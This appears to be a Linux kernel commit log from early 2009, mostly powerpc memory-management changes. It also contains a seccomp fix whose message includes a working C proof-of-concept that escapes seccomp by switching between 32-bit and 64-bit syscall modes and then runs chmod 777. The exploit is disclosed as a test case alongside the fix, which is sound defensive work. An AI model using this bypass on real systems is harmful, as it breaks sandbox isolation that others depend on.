1. 23 Mar, 2009 1 commit
  2. 19 Mar, 2009 2 commits
    • Benjamin Herrenschmidt's avatar
      powerpc/mm: Unify PTE_RPN_SHIFT and _PAGE_CHG_MASK definitions · a7d2dac8
      Benjamin Herrenschmidt authored
      
      
      This updates the 32-bit headers to use the same definitions for the RPN
      shift inside the PTE as 64-bit, and thus updates _PAGE_CHG_MASK to
      become identical.
      
      This does introduce a runtime visible difference, which is that now,
      _PAGE_HASHPTE will be part of _PAGE_CHG_MASK and thus preserved. However
      this should have no practical effect as it should have been preserved in
      the first place and we got away with not having it there due to our
      PTE access functions preserving it anyway.
      Signed-off-by: default avatarBenjamin Herrenschmidt <benh@kernel.crashing.org>
      a7d2dac8
    • Benjamin Herrenschmidt's avatar
      powerpc/mm: Split the various pgtable-* headers based on MMU type · c605782b
      Benjamin Herrenschmidt authored
      
      
      This patch moves the definition of the PTE format for each MMU type
      to separate files instead of all in one file. This improves overall
      maintainability and will make it easier to add new types.
      
      On 64-bit, additionally, I've separated the headers relative to the
      format of the page table tree (3 vs. 4 levels for 64K vs 4K pages)
      from the headers specific to the PTE format for hash based processors,
      this will make it easier to add support for Book3 "E" 64-bit
      implementations.
      
      There are still some type-related ifdef's in the generic headers,
      we might remove them in the long run, but this patch shouldn't result
      in any code change, -hopefully- just definitions being moved around.
      Signed-off-by: default avatarBenjamin Herrenschmidt <benh@kernel.crashing.org>
      c605782b
  3. 17 Mar, 2009 1 commit
  4. 11 Mar, 2009 7 commits
  5. 09 Mar, 2009 1 commit
  6. 02 Mar, 2009 1 commit
    • Roland McGrath's avatar
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath authored
      
      
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: default avatarRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  7. 22 Feb, 2009 9 commits
  8. 14 Feb, 2009 1 commit
    • Yuri Tikhonov's avatar
      powerpc/44x: Support for 256KB PAGE_SIZE · e1240122
      Yuri Tikhonov authored
      This patch adds support for 256KB pages on ppc44x-based boards.
      
      For simplification of implementation with 256KB pages we still assume
      2-level paging. As a side effect this leads to wasting extra memory space
      reserved for PTE tables: only 1/4 of pages allocated for PTEs are
      actually used. But this may be an acceptable trade-off to achieve the
      high performance we have with big PAGE_SIZEs in some applications (e.g.
      RAID).
      
      Also with 256KB PAGE_SIZE we increase THREAD_SIZE up to 32KB to minimize
      the risk of stack overflows in the cases of on-stack arrays, which size
      depends on the page size (e.g. multipage BIOs, NTFS, etc.).
      
      With 256KB PAGE_SIZE we need to decrease the PKMAP_ORDER at least down
      to 9, otherwise all high memory (2 ^ 10 * PAGE_SIZE == 256MB) we'll be
      occupied by PKMAP addresses leaving no place for vmalloc. We do not
      separate PKMAP_ORDER for 256K from 16K/64K PAGE_SIZE here; actually that
      value of 10 in support for 16K/64K had been selected rather intuitively.
      Thus now for all cases of PAGE_SIZE on ppc44x (including the default, 4KB,
      one) we have 512 pages for PKMAP.
      
      Because ELF standard supports only page sizes up to 64K, then you should
      use binutils later than 2.17.50.0.3 with '-zmax-page-size' set to 256K
      for building applications, which are to be run with the 256KB-page sized
      kernel. If using the older binutils, then you should patch them like follows:
      
      	--- binutils/bfd/elf32-ppc.c.orig
      	+++ binutils/bfd/elf32-ppc.c
      
      	-#define ELF_MAXPAGESIZE                0x10000
      	+#define ELF_MAXPAGESIZE                0x40000
      
      One more restriction we currently have with 256KB page sizes is inability
      to use shmem safely, so, for now, the 256KB is available only if you turn
      the CONFIG_SHMEM option off (another variant is to use BROKEN).
      Though, if you need shmem with 256KB pages, you can always remove the !SHMEM
      dependency in 'config PPC_256K_PAGES', and use the workaround available here:
       http://lkml.org/lkml/2008/12/19/20
      
      Signed-off-by: default avatarYuri Tikhonov <yur@emcraft.com>
      Signed-off-by: default avatarIlya Yanok <yanok@emcraft.com>
      Signed-off-by: default avatarJosh Boyer <jwboyer@linux.vnet.ibm.com>
      e1240122
  9. 12 Feb, 2009 3 commits
  10. 10 Feb, 2009 2 commits
    • Benjamin Herrenschmidt's avatar
      powerpc/mm: Rework I$/D$ coherency (v3) · 8d30c14c
      Benjamin Herrenschmidt authored
      
      
      This patch reworks the way we do I and D cache coherency on PowerPC.
      
      The "old" way was split in 3 different parts depending on the processor type:
      
         - Hash with per-page exec support (64-bit and >= POWER4 only) does it
      at hashing time, by preventing exec on unclean pages and cleaning pages
      on exec faults.
      
         - Everything without per-page exec support (32-bit hash, 8xx, and
      64-bit < POWER4) does it for all page going to user space in update_mmu_cache().
      
         - Embedded with per-page exec support does it from do_page_fault() on
      exec faults, in a way similar to what the hash code does.
      
      That leads to confusion, and bugs. For example, the method using update_mmu_cache()
      is racy on SMP where another processor can see the new PTE and hash it in before
      we have cleaned the cache, and then blow trying to execute. This is hard to hit but
      I think it has bitten us in the past.
      
      Also, it's inefficient for embedded where we always end up having to do at least
      one more page fault.
      
      This reworks the whole thing by moving the cache sync into two main call sites,
      though we keep different behaviours depending on the HW capability. The call
      sites are set_pte_at() which is now made out of line, and ptep_set_access_flags()
      which joins the former in pgtable.c
      
      The base idea for Embedded with per-page exec support, is that we now do the
      flush at set_pte_at() time when coming from an exec fault, which allows us
      to avoid the double fault problem completely (we can even improve the situation
      more by implementing TLB preload in update_mmu_cache() but that's for later).
      
      If for some reason we didn't do it there and we try to execute, we'll hit
      the page fault, which will do a minor fault, which will hit ptep_set_access_flags()
      to do things like update _PAGE_ACCESSED or _PAGE_DIRTY if needed, we just make
      this guys also perform the I/D cache sync for exec faults now. This second path
      is the catch all for things that weren't cleaned at set_pte_at() time.
      
      For cpus without per-pag exec support, we always do the sync at set_pte_at(),
      thus guaranteeing that when the PTE is visible to other processors, the cache
      is clean.
      
      For the 64-bit hash with per-page exec support case, we keep the old mechanism
      for now. I'll look into changing it later, once I've reworked a bit how we
      use _PAGE_EXEC.
      
      This is also a first step for adding _PAGE_EXEC support for embedded platforms
      Signed-off-by: default avatarBenjamin Herrenschmidt <benh@kernel.crashing.org>
      8d30c14c
    • Michael Ellerman's avatar
  11. 28 Jan, 2009 1 commit
    • Kumar Gala's avatar
      powerpc/fsl-booke: Cleanup init/exception setup to be runtime · 105c31df
      Kumar Gala authored
      
      
      We currently have a few variants of fsl-booke processors (e500v1, e500v2,
      e500mc, and e200).  They all have minor differences that we had previously
      been handling via ifdefs.
      
      To move towards having this support the following changes have been made:
      
      * PID1, PID2 only exist on e500v1 & e500v2 and should not be accessed on
        e500mc or e200.  We use MMUCFG[NPIDS] to determine which case we are
        since we only touch PID1/2 in extremely early init code.
      
      * Not all IVORs exist on all the processors so introduce cpu_setup
        functions for each variant to setup the proper IVORs that are either
        unique or exist but have some variations between the processors
      Signed-off-by: default avatarKumar Gala <galak@kernel.crashing.org>
      105c31df
  12. 15 Jan, 2009 1 commit
  13. 14 Jan, 2009 2 commits
  14. 12 Jan, 2009 1 commit
  15. 08 Jan, 2009 1 commit
    • Carl Love's avatar
      powerpc/oprofile: IBM CELL: add SPU event profiling support · 88382329
      Carl Love authored
      
      
      This patch adds the SPU event based profiling funcitonality for the
      IBM Cell processor.  Previously, the CELL OProfile kernel code supported
      PPU event, PPU cycle profiling and SPU cycle profiling.   The addition of
      SPU event profiling allows the users to identify where in their SPU code
      various SPU evnets are occuring.  This should help users further identify
      issues with their code.  Note, SPU profiling has some limitations due to HW
      constraints.  Only one event at a time can be used for profiling and SPU event
      profiling must be time sliced across all of the SPUs in a node.
      
      The patch adds a new arch specific file to the OProfile file system. The
      file has bit 0 set to indicate that the kernel supports SPU event profiling.
      The user tool must check this file/bit to make sure the kernel supports
      SPU event profiling before trying to do SPU event profiling.  The user tool
      check is part of the user tool patch for SPU event profiling.
      Signed-off-by: default avatarCarl Love <carll@us.ibm.com>
      Signed-off-by: default avatarRobert Richter <robert.richter@amd.com>
      88382329
  16. 07 Jan, 2009 6 commits